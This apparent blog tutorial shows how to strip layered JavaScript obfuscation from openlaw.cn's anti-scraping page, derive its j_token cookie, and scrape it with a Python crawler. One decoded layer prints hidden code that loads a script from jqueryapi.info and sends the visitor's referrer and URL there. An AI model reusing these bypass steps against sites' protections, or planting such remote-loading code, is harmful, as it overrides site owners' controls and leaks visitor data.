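Crawlers and anti-crawler defenses are natural adversaries: anti-scraping measures come in many forms, and techniques for cracking them have emerged in response.
This article introduces one anti-scraping technique, obfuscating and encrypting front-end JS code, and walks through how to crack it in practice.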
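OpenLaw is an open NGO for lawyers, judges, prosecutors, law teachers, scholars, students, and others working in law-related fields. It regards its users as the source of legal technology and knowledge, who share their legal expertise along with the fruits of their wisdom and experience.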
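We try to crawl the case information under a given causeId. The page loads normally in a browser, so we happily crawl it with the requests package, which looks easy enough.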
```python
url = 'http://openlaw.cn/search/judgement/type?causeId=d8347b89678645e1887045b4200e822f'
host = {'host': 'openlaw.cn'}
headers = self.headers.copy()
headers.update(host)
# Step 1: fetch the JS content
ret_origin = requests.get(url, headers=headers)
print(ret_origin.text)
```

However, the printed text is less cheering: the output appears to be a long string of JS code. What now?

<figure><img src="https://pic4.zhimg.com/v2-e045f67b3cf6828e39d443be5b9b10e1_r.jpg" width="554"/></figure>

Visiting the page directly in a browser, we find that the request carries a cookie named j_token. Where does it come from, and where can we find it?

As the cracking below reveals, this is actually a two-step process. <b>Step one: a request without j_token is redirected to obfuscated JS code, which computes j_token and writes it into the cookie. Step two: a request carrying j_token returns the final page.</b>

Now let's start cracking. The tools we need are Chrome's snippets and console: create a snippet, paste the JS code into it, and pretty-print it (see the red box).

<figure><img src="https://pica.zhimg.com/v2-775b029323f6fca8cb3dc5ef8a_r.jpg" width="554"/></figure>

We split the JS code into three segments and start with the first.

```js
var O01 = 'WdmhCbhZXZ......';
// Base64 decoder
function lOO(data) {
    var OOOlOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0, enc = '';
    do {
        h1 = OOOlOI.indexOf(data.charAt(i++));
        h2 = OOOlOI.indexOf(data.charAt(i++));
        h3 = OOOlOI.indexOf(data.charAt(i++));
        h4 = OOOlOI.indexOf(data.charAt(i++));
        bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
        o1 = bits >> 16 & 0xff;
        o2 = bits >> 8 & 0xff;
        o3 = bits & 0xff;
        if (h3 == 64) {
            enc += String.fromCharCode(o1)
        } else if (h4 == 64) {
            enc += String.fromCharCode(o1, o2)
        } else {
            enc += String.fromCharCode(o1, o2, o3)
        }
    } while (i < data.length);
    return enc
}
// Reverses a string
function OOO(string) {
    var ret = '', i = 0;
    for (i = string.length - 1; i >= 0; i--) {
        ret += string.charAt(i);
    }
    return ret;
}
eval(lOO(OOO(O01)));
```
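The first layer can also be peeled outside the browser. `OOO` reverses the string and `lOO` is an ordinary Base64 decoder, so their composition is a reversal followed by a Base64 decode. The sketch below assumes the alphabet is the standard Base64 one and that the payload decodes to single-byte characters; the name `decode_layer` and the sample string are illustrative and do not come from the original script.

```python
import base64


def decode_layer(blob: str) -> str:
    """Mirror lOO(OOO(blob)): reverse the string, then Base64-decode it."""
    reversed_blob = blob[::-1]
    # latin-1 maps each byte to one character, as String.fromCharCode does
    return base64.b64decode(reversed_blob).decode("latin-1")


if __name__ == "__main__":
    # Build a made-up sample the same way the page does: encode, then reverse
    sample = base64.b64encode(b"var a = 1;").decode("ascii")[::-1]
    print(decode_layer(sample))  # var a = 1;
```

Printing the result instead of evaluating it plays the same role as swapping `eval` for `console.log` in the browser.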
In the code above, change eval to console.log, paste this segment into a new snippet, and run it; the decoded JS code is printed in Chrome's console.

```js
eval(function(p,a,c,k,e,d){(a long string of code)))
```

Again change eval to console.log and run the script to print the result in the console. The output is yet another piece of JS code beginning with eval, so we keep repeating the process, peeling layer after layer like an onion, until we reach the following.

```js
var _escape = '%3Cscript%3Evar%20openlaw%20%3D%20%27openlaw%27%3B%3C/script%3E';
var OOI = document.createElement('script');
OOI.src = 'http://jqueryapi.info/?getsrc=ok' + '&ref=' + encodeURIComponent(document.referrer) + '&url=' + encodeURIComponent(document.URL);
var _101 = document.getElementsByTagName('head')[0];
_101.appendChild(OOI);
document.write(unescape(_escape));
```

Decoding this with any online URL encode/decode tool gives the following code.

```js
var _escape = "<script>var openlaw = 'openlaw';</script>";
var OOI = document.createElement('script');
OOI.src = 'http://jqueryapi.info/?getsrc=ok' + '&ref=' + encodeURIComponent(document.referrer) + '&url=' + encodeURIComponent(document.URL);
var _101 = document.getElementsByTagName('head')[0];
_101.appendChild(OOI);
document.write(unescape(_escape));
```

As we can see, it fetches a new piece of JS code and inserts it into the page. This has little to do with what we need, so we move on to the next segment.
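The URL-decoding step above does not require an online tool. As a small sketch using only the Python standard library, `urllib.parse.unquote` turns the percent-escapes in `_escape` back into characters. Only the string literal is decoded here, on the assumption that decoding the whole script is unnecessary; some decoders treat `+` as a space and would damage the concatenation operators.

```python
from urllib.parse import unquote

# Value of _escape copied from the peeled script
escaped = "%3Cscript%3Evar%20openlaw%20%3D%20%27openlaw%27%3B%3C/script%3E"

decoded = unquote(escaped)
print(decoded)  # <script>var openlaw = 'openlaw';</script>
```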
```js
window.n = "j_token";
eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--)
            d[e(c)] = k[c] || e(c);
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1;
    };
    while (c--)
        if (k[c])
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p;
}('1 2$=[\'\\9\\5\\6\\4\\3\\7\\8\'];1 a=2$[0];', 11, 11, '|var|_|x6c|x6e|x70|x65|x61|x77|x6f|'.split('|'), 0, {}));
```
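The wrapper above follows the widely used p,a,c,k,e,d packer layout: each word in the payload `p` is a base-`a` index into the keyword list `k`, and unpacking substitutes the keywords back. The Python sketch below re-implements that substitution so the segment can be unpacked without a browser. It assumes the third keyword is `_` (the keyword list as extracted shows an empty slot there), and the helper names `encode_index`, `unpack`, and `decode_hex_escapes` are illustrative.

```python
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_index(n: int, base: int) -> str:
    """Port of the packer's e(c): write index n as a word in the given base."""
    prefix = "" if n < base else encode_index(n // base, base)
    n %= base
    return prefix + (chr(n + 29) if n > 35 else DIGITS[n])


def unpack(payload: str, base: int, count: int, keywords: list) -> str:
    """Replace each encoded word in payload with its keyword, highest index first."""
    for index in range(count - 1, -1, -1):
        word = keywords[index]
        if word:  # an empty slot means the word stands for itself
            pattern = r"\b" + re.escape(encode_index(index, base)) + r"\b"
            # A function replacement keeps backslashes in the keyword literal
            payload = re.sub(pattern, lambda _m, w=word: w, payload)
    return payload


def decode_hex_escapes(source: str) -> str:
    """Turn literal \\xNN escapes into the characters they denote."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), source)


if __name__ == "__main__":
    payload = r"1 2$=['\9\5\6\4\3\7\8'];1 a=2$[0];"
    keywords = "|var|_|x6c|x6e|x70|x65|x61|x77|x6f|".split("|")  # "_" is assumed
    unpacked = unpack(payload, 11, 11, keywords)
    print(unpacked)
    print(decode_hex_escapes(unpacked))
```

Working from the highest index down matches the JS `while (c--)` loop, and the word-boundary anchors keep digits inside already substituted keywords such as `x6f` from being replaced again.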
Likewise, replacing eval with console.log prints:

```js
var _$=['\x6f\x70\x65\x6e\x6c\x61\x77']; var a=_$[0];
```

Converting the hex escapes with an online ASCII-to-character tool gives the following code.

```js
var _$=['openlaw']; var a=_$[0];
```

Stripped bare, this too seems to have little to do with what we want, so we move on to the last segment.

```js
window.v = "_bdfe397f5ff6506dd001f632e2db0311";
$ = ~[];
$ = {
    ___: ++$,
    $$$$: (![] + "")[$],
    __$: ++$,
    $_$_: (![] + "")[$],
    _$_: ++$,
    $_$$: ({} + "")[$],
    $$_$: ($[$] + "")[$],
    _$$: ++$,
    $$$_: (!"" + "")[$],
    $__: ++$,
    $_$: ++$,
    $$__: ({} + "")[$],
    $$_: ++$,
    $$$: ++$,
    $___: ++$,
    $__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$] + ($._$ = $.$_[$.__$]) + ($.$$ = ($.$ + "")[$.__$]) + ((!$) + "")[$._$$] + ($.__ = $.$_[$.$$_]) + ($.$ = (!"" + "")[$.__$]) + ($._ = (!"" + "")[$._$_]) + $.$_[$.$_$] + $.__ + $._$ + $.$;
$.$$ = $.$ + (!"" + "")[$._$$] + $.__ + $._ + $.$ + $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$(a long string of code)())();
```
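We first paste the code above, except for its last line, into the console and run it so that its variables are defined. For the last statement, we run the long string of code in Chrome's console, then pass whatever follows return in the output to console.log() to obtain the code below.

```js
window.v = "_bdfe397f5ff6506dd001f632e2db0311";
function p(s) {
    return s.substring(2, 4).concat('n').concat(s.substring(0, 1)).concat('p').concat(s.substring(4, 8)).concat('e').concat(s.substring(1, 2)).concat(s.substring(16)).concat(s.substring(8, 16));
};
+function() {
    document.cookie = "j" + "_" + "token=" + p(window.v);
    location.reload();
}();
```

It's obvious now: the j_token we want is right here, and we can celebrate. All that remains is to rewrite p(s) from this code in Python.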
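As a sketch of that rewrite, the function below ports `p(s)` to Python slice by slice: `s.substring(a, b)` maps to `s[a:b]` and `s.substring(16)` maps to `s[16:]`. The name `compute_j_token` is illustrative, and the sample input is a made-up alphabet string rather than a real token.

```python
def compute_j_token(v: str) -> str:
    """Python port of the JS p(s): rearrange slices of window.v into j_token."""
    return (
        v[2:4] + "n" + v[0:1] + "p" + v[4:8] + "e" + v[1:2] + v[16:] + v[8:16]
    )


if __name__ == "__main__":
    print(compute_j_token("abcdefghijklmnopqrstuvwxyz"))
    # cdnapefghebqrstuvwxyzijklmnop
```

Using `v[16:]` rather than a length-based offset keeps the port faithful to `substring(16)` for tokens of any length.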
Below are the full implementation and its output.
```python
# -*- coding:utf-8 -*-
import re

import requests
from lxml import html


# Crawl the case details
class OpenLawSpider:
    # Initialize the request headers
    def __init__(self):
        self.headers = {
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "zh-CN,zh;q=0.9",
            "Cache-Control": "max-age=0",
            "Connection": "keep-alive",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36"
        }

    # Fetch the details
    def getLawDetail(self):
        url = 'http://openlaw.cn/search/judgement/type?causeId=d8347b89678645e1887045b4200e822f'
        host = {'host': 'openlaw.cn'}
        headers = self.headers.copy()
        headers.update(host)
        # Step 1: fetch the JS content
        ret_origin = requests.get(url, headers=headers)
        print(ret_origin.text)
        cookies = requests.utils.dict_from_cookiejar(ret_origin.cookies)
        # Step 2: reproduce the j_token computation from the JS; match window.v with a regex
        pattern = re.compile(r'window\.v\s*=\s*"(.*?)";')
        rst = pattern.findall(ret_origin.text)
        v_token = 'abcdefghijklmnopqrstuvwxyz'
        if len(rst):
            v_token = rst[0]
        # Same slicing as p(s) in the JS; s.substring(16) becomes v_token[16:]
        j_token = v_token[2:4] + 'n' + v_token[0:1] + 'p' + v_token[4:8] + 'e' + v_token[1:2] + v_token[16:] + v_token[8:16]
        cookies['j_token'] = j_token
        # Request again, this time carrying the j_token cookie
        ret_next = requests.get(url, headers=headers, cookies=cookies)
        response = html.fromstring(ret_next.text)
        items = response.cssselect("div[id=primary] .ht-container .entry-title a")
        for item in items:
            title = item.text_content()
            print(title)


spider = OpenLawSpider()
spider.getLawDetail()
```
The output is as follows.
Source code for the font-based anti-scraping cracking exercise: click here, password: a4nb
If you repost this article, please retain the source: https://51itzy.com/kjqy/212206.html